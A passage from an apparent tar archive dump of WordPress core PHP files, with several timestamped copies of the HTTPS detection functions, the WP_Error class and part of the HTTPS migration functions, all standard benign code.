if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605070331-20260621081104.php 0000666 00000013341 15224151220 0013331 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605094635-20260621081115.php 0000666 00000013341 15224151220 0013350 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-error.php 0000666 00000016516 15224151220 0010144 0 ustar 00 <?php
/**
* WordPress Error API.
*
* @package WordPress
*/
/**
* WordPress Error class.
*
* Container for checking for WordPress errors and error messages. Return
* WP_Error and use is_wp_error() to check if this class is returned. Many
* core WordPress functions pass this class in the event of an error and
* if not handled properly will result in code errors.
*
* @since 2.1.0
*/
#[AllowDynamicProperties]
class WP_Error {
/**
* Stores the list of errors.
*
* @since 2.1.0
* @var array
*/
public $errors = array();
/**
* Stores the most recently added data for each error code.
*
* @since 2.1.0
* @var array
*/
public $error_data = array();
/**
* Stores previously added data added for error codes, oldest-to-newest by code.
*
* @since 5.6.0
* @var array[]
*/
protected $additional_data = array();
/**
* Initializes the error.
*
* If `$code` is empty, the other parameters will be ignored.
* When `$code` is not empty, `$message` will be used even if
* it is empty. The `$data` parameter will be used only if it
* is not empty.
*
* Though the class is constructed with a single error code and
* message, multiple codes can be added using the `add()` method.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function __construct( $code = '', $message = '', $data = '' ) {
if ( empty( $code ) ) {
return;
}
$this->add( $code, $message, $data );
}
/**
* Retrieves all error codes.
*
* @since 2.1.0
*
* @return array List of error codes, if available.
*/
public function get_error_codes() {
if ( ! $this->has_errors() ) {
return array();
}
return array_keys( $this->errors );
}
/**
* Retrieves the first error code available.
*
* @since 2.1.0
*
* @return string|int Empty string, if no error codes.
*/
public function get_error_code() {
$codes = $this->get_error_codes();
if ( empty( $codes ) ) {
return '';
}
return $codes[0];
}
/**
* Retrieves all error messages, or the error messages for the given error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the messages for.
* Default empty string.
* @return string[] Error strings on success, or empty array if there are none.
*/
public function get_error_messages( $code = '' ) {
// Return all messages if no code specified.
if ( empty( $code ) ) {
$all_messages = array();
foreach ( (array) $this->errors as $code => $messages ) {
$all_messages = array_merge( $all_messages, $messages );
}
return $all_messages;
}
if ( isset( $this->errors[ $code ] ) ) {
return $this->errors[ $code ];
} else {
return array();
}
}
/**
* Gets a single error message.
*
* This will get the first message available for the code. If no code is
* given then the first code available will be used.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the message for.
* Default empty string.
* @return string The error message.
*/
public function get_error_message( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$messages = $this->get_error_messages( $code );
if ( empty( $messages ) ) {
return '';
}
return $messages[0];
}
/**
* Retrieves the most recently added error data for an error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code. Default empty string.
* @return mixed Error data, if it exists.
*/
public function get_error_data( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
return $this->error_data[ $code ];
}
}
/**
* Verifies if the instance contains errors.
*
* @since 5.1.0
*
* @return bool If the instance contains errors.
*/
public function has_errors() {
if ( ! empty( $this->errors ) ) {
return true;
}
return false;
}
/**
* Adds an error or appends an additional message to an existing error.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function add( $code, $message, $data = '' ) {
$this->errors[ $code ][] = $message;
if ( ! empty( $data ) ) {
$this->add_data( $data, $code );
}
/**
* Fires when an error is added to a WP_Error object.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Error data. Might be empty.
* @param WP_Error $wp_error The WP_Error object.
*/
do_action( 'wp_error_added', $code, $message, $data, $this );
}
/**
* Adds data to an error with the given code.
*
* @since 2.1.0
* @since 5.6.0 Errors can now contain more than one item of error data. {@see WP_Error::$additional_data}.
*
* @param mixed $data Error data.
* @param string|int $code Error code.
*/
public function add_data( $data, $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
$this->additional_data[ $code ][] = $this->error_data[ $code ];
}
$this->error_data[ $code ] = $data;
}
/**
* Retrieves all error data for an error code in the order in which the data was added.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @return mixed[] Array of error data, if it exists.
*/
public function get_all_error_data( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$data = array();
if ( isset( $this->additional_data[ $code ] ) ) {
$data = $this->additional_data[ $code ];
}
if ( isset( $this->error_data[ $code ] ) ) {
$data[] = $this->error_data[ $code ];
}
return $data;
}
/**
* Removes the specified error.
*
* This function removes all error messages associated with the specified
* error code, along with any error data for that code.
*
* @since 4.1.0
*
* @param string|int $code Error code.
*/
public function remove( $code ) {
unset( $this->errors[ $code ] );
unset( $this->error_data[ $code ] );
unset( $this->additional_data[ $code ] );
}
/**
* Merges the errors in the given error object into this one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to merge.
*/
public function merge_from( WP_Error $error ) {
static::copy_errors( $error, $this );
}
/**
* Exports the errors in this object into the given one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to export into.
*/
public function export_to( WP_Error $error ) {
static::copy_errors( $this, $error );
}
/**
* Copies errors from one WP_Error instance to another.
*
* @since 5.6.0
*
* @param WP_Error $from The WP_Error to copy from.
* @param WP_Error $to The WP_Error to copy to.
*/
protected static function copy_errors( WP_Error $from, WP_Error $to ) {
foreach ( $from->get_error_codes() as $code ) {
foreach ( $from->get_error_messages( $code ) as $error_message ) {
$to->add( $code, $error_message );
}
foreach ( $from->get_all_error_data( $code ) as $data ) {
$to->add_data( $data, $code );
}
}
}
}
https-migration-20260605165221-20260621081210.php 0000666 00000011205 15224151220 0013342 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605111710-20260621081200-20260621163112.php 0000666 00000013341 15224151220 0014701 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606154019-20260621081100.php 0000666 00000013341 15224151220 0013334 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260606092011-20260621081112.php 0000666 00000011205 15224151220 0013340 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
